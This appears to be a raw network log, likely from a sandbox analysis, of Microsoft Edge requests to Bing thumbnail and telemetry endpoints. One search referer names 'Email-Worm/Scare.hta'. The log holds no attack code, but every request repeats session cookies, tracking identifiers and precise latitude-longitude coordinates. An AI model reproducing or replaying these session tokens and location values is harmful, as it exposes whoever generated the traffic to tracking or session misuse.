cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 756
cache-control: public, max-age=2592000
date: Wed, 12 Mar 2025 02:37:03 GMT
x-cache: TCP_MISS from a95-101-143-215.deploy.akamaitechnologies.com (AkamaiGHost/22.0.0-bb2a2774a48042877147cbed2bad8ca6) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df36f
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.3c42417e-238d-4980-8afa-9e3e29ee5d9e&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /th?id=ODLS.3c42417e-238d-4980-8afa-9e3e29ee5d9e&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1595
cache-control: public, max-age=1778024
date: Wed, 12 Mar 2025 02:37:03 GMT
x-cache: TCP_MEM_HIT from a95-101-143-215.deploy.akamaitechnologies.com (AkamaiGHost/22.0.0-bb2a2774a48042877147cbed2bad8ca6) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df3a6
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.7e573865-4b8e-495f-9687-175a9f32a06a&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /th?id=ODLS.7e573865-4b8e-495f-9687-175a9f32a06a&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 557
cache-control: public, max-age=1001836
date: Wed, 12 Mar 2025 02:37:03 GMT
x-cache: TCP_MEM_HIT from a95-101-143-215.deploy.akamaitechnologies.com (AkamaiGHost/22.0.0-bb2a2774a48042877147cbed2bad8ca6) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df3a7
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.20611289-3a68-44f4-ab60-d31c34214326&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /th?id=ODLS.20611289-3a68-44f4-ab60-d31c34214326&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 422
cache-control: public, max-age=1164958
date: Wed, 12 Mar 2025 02:37:03 GMT
x-cache: TCP_MEM_HIT from a95-101-143-215.deploy.akamaitechnologies.com (AkamaiGHost/22.0.0-bb2a2774a48042877147cbed2bad8ca6) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df3a4
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.3c42417e-238d-4980-8afa-9e3e29ee5d9e&w=16&h=16&c=7&o=6&pid=1.7

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /th?id=ODLS.3c42417e-238d-4980-8afa-9e3e29ee5d9e&w=16&h=16&c=7&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 675
x-check-cacheable: YES
cache-control: public, max-age=2451598
date: Wed, 12 Mar 2025 02:37:03 GMT
x-cache: TCP_MISS from a95-101-143-215.deploy.akamaitechnologies.com (AkamaiGHost/22.0.0-bb2a2774a48042877147cbed2bad8ca6) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df3a5
GET

https://th.bing.com/th?id=ODLS.7e573865-4b8e-495f-9687-175a9f32a06a&w=16&h=16&c=7&o=6&pid=1.7

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /th?id=ODLS.7e573865-4b8e-495f-9687-175a9f32a06a&w=16&h=16&c=7&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1800
x-check-cacheable: YES
cache-control: public, max-age=2485491
date: Wed, 12 Mar 2025 02:37:03 GMT
x-cache: TCP_MISS from a95-101-143-215.deploy.akamaitechnologies.com (AkamaiGHost/22.0.0-bb2a2774a48042877147cbed2bad8ca6) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df3b0
GET

https://th.bing.com/th?id=ODLS.20d00b2f-22fa-4116-935b-82c9369365fd&w=32&h=32&qlt=96&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /th?id=ODLS.20d00b2f-22fa-4116-935b-82c9369365fd&w=32&h=32&qlt=96&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 480
cache-control: public, max-age=2592000
date: Wed, 12 Mar 2025 02:37:03 GMT
x-cache: TCP_MISS from a95-101-143-215.deploy.akamaitechnologies.com (AkamaiGHost/22.0.0-bb2a2774a48042877147cbed2bad8ca6) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df3af
x-check-cacheable: YES
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1741747022680%2C%22Name%22%3A%22WriteEffectiveLocationSuccess%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5D

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1741747022680%2C%22Name%22%3A%22WriteEffectiveLocationSuccess%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 616
cache-control: public, max-age=1629800
date: Wed, 12 Mar 2025 02:37:03 GMT
x-cache: TCP_MEM_HIT from a95-101-143-215.deploy.akamaitechnologies.com (AkamaiGHost/22.0.0-bb2a2774a48042877147cbed2bad8ca6) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df3cf
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.b2099a11-ca12-45ce-bede-5df940e38a48&w=32&h=32&qlt=97&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /th?id=ODLS.b2099a11-ca12-45ce-bede-5df940e38a48&w=32&h=32&qlt=97&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 944
cache-control: public, max-age=1513473
date: Wed, 12 Mar 2025 02:37:03 GMT
x-cache: TCP_MEM_HIT from a95-101-143-215.deploy.akamaitechnologies.com (AkamaiGHost/22.0.0-bb2a2774a48042877147cbed2bad8ca6) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df3ce
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=98&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=98&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
